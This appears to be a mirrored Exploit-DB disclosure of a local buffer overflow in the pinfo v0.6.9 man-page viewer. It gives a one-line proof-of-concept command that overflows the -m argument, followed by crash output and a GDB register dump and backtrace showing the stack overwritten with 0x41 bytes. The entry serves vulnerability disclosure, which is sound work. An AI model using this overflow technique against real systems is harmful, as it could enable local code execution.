pinfo v0.6.9 - Local Buffer Overflow

vendor:

pinfo

by:

Nassim Asrir

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: pinfo

Affected Version From: v0.6.9

Affected Version To: v0.6.9

Patch Exists: YES

Related CWE: N/A

CPE: pinfo

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

N/A

pinfo v0.6.9 – Local Buffer Overflow

pinfo is a viewer for man pages. A local buffer overflow vulnerability exists in pinfo v0.6.9 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by supplying a large amount of data to the -m argument, resulting in a segmentation fault and potentially allowing the execution of arbitrary code.

Mitigation:

Upgrade to the latest version of pinfo.

Source

Exploit-DB raw data:

# Title: pinfo v0.6.9 - Local Buffer Overflow
# Author: Nassim Asrir
# Researcher at: Henceforth
# Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: N/A

# Download #

$ apt-get install pinfo

# POC #

For any Question or discussion about this vuln: https://www.facebook.com/asrirnassim/ 

$ pinfo -m `python -c 'print "A"*600'`
Przemek's Info Viewer v0.6.9
Looking for man page...

Caught signal 11, bye!
Segmentation fault


# GDB Output #

$ gdb pinfo

(gdb) r -m `python -c 'print "A"*600'`

Program received signal SIGSEGV, Segmentation fault.
__GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84
84	getenv.c: No such file or directory.

(gdb) info registers 
rax            0x54	84
rbx            0x4141414141414141	4702111234474983745   <==== 
rcx            0x1a8	424
rdx            0x10	16
rsi            0x7fffffffdaae	140737488345774
rdi            0x7ffff79831a8	140737347334568
rbp            0x7fffffffe0a8	0x7fffffffe0a8
rsp            0x7fffffffda90	0x7fffffffda90   
r8             0x0	0
r9             0x20	32
r10            0x1ec	492
r11            0x7ffff796c630	140737347241520
r12            0x4554	17748
r13            0x4	4
r14            0x2	2
r15            0x7ffff79831aa	140737347334570
rip            0x7ffff73c911d	0x7ffff73c911d <__GI_getenv+173>
eflags         0x10206	[ PF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0

(gdb) where
#0  __GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84
#1  0x00007ffff796c661 in initscr () from /lib/x86_64-linux-gnu/libncursesw.so.5
#2  0x000055555556214a in ?? ()
#3  0x000055555555f165 in ?? ()
#4  0x0000555555557552 in ?? ()
#5  0x4141414141414141 in ?? ()
#6  0x4141414141414141 in ?? ()
#7  0x4141414141414141 in ?? ()
#8  0x4141414141414141 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
#15 0x4141414141414141 in ?? ()
#16 0x4141414141414141 in ?? ()
#17 0x4141414141414141 in ?? ()
#18 0x4141414141414141 in ?? ()
#19 0x4141414141414141 in ?? ()
#20 0x4141414141414141 in ?? ()
#21 0x4141414141414141 in ?? ()
#22 0x4141414141414141 in ?? ()
#23 0x4141414141414141 in ?? ()
#24 0x4141414141414141 in ?? ()
#25 0x4141414141414141 in ?? ()
#26 0x4141414141414141 in ?? ()
#27 0x4141414141414141 in ?? ()
#28 0x4141414141414141 in ?? ()
#29 0x4141414141414141 in ?? ()
#30 0x4141414141414141 in ?? ()
#31 0x4141414141414141 in ?? ()
#32 0x4141414141414141 in ?? ()
#33 0x4141414141414141 in ?? ()
#34 0x4141414141414141 in ?? ()
#35 0x4141414141414141 in ?? ()
#36 0x4141414141414141 in ?? ()
#37 0x4141414141414141 in ?? ()
#38 0x4141414141414141 in ?? ()
#39 0x4141414141414141 in ?? ()
#40 0x4141414141414141 in ?? ()
#41 0x00007fffffff0020 in ?? ()
#42 0x00007fffffffebaa in ?? ()
---Type <return> to continue, or q <return> to quit---
#43 0x00007fffffffebc2 in ?? ()
#44 0x00007fffffffebd6 in ?? ()
#45 0x00007fffffffebe1 in ?? ()
#46 0x00007fffffffec07 in ?? ()
#47 0x00007fffffffec18 in ?? ()
#48 0x00007fffffffec48 in ?? ()
#49 0x00007fffffffec52 in ?? ()
#50 0x00007fffffffec73 in ?? ()
#51 0x00007fffffffec7d in ?? ()
#52 0x00007fffffffec86 in ?? ()
#53 0x00007fffffffec91 in ?? ()
#54 0x00007fffffffeca4 in ?? ()
#55 0x00007fffffffecb7 in ?? ()
#56 0x00007fffffffeccc in ?? ()
#57 0x00007fffffffed08 in ?? ()
#58 0x00007fffffffed33 in ?? ()
#59 0x00007fffffffed58 in ?? ()
#60 0x00007fffffffed63 in ?? ()
#61 0x00007fffffffed74 in ?? ()
#62 0x00007fffffffed84 in ?? ()
#63 0x00007fffffffed8f in ?? ()
#64 0x00007fffffffedc3 in ?? ()
#65 0x00007fffffffeddc in ?? ()
#66 0x00007fffffffee0d in ?? ()
#67 0x00007fffffffee30 in ?? ()
#68 0x00007fffffffee3f in ?? ()
#69 0x00007fffffffee47 in ?? ()
#70 0x00007fffffffee59 in ?? ()
#71 0x00007fffffffee75 in ?? ()
#72 0x00007fffffffee82 in ?? ()
#73 0x00007fffffffeeb5 in ?? ()
#74 0x00007fffffffeed1 in ?? ()
#75 0x00007fffffffeeee in ?? ()
#76 0x00007fffffffef28 in ?? ()
#77 0x00007fffffffef97 in ?? ()
#78 0x0000000000000000 in ?? ()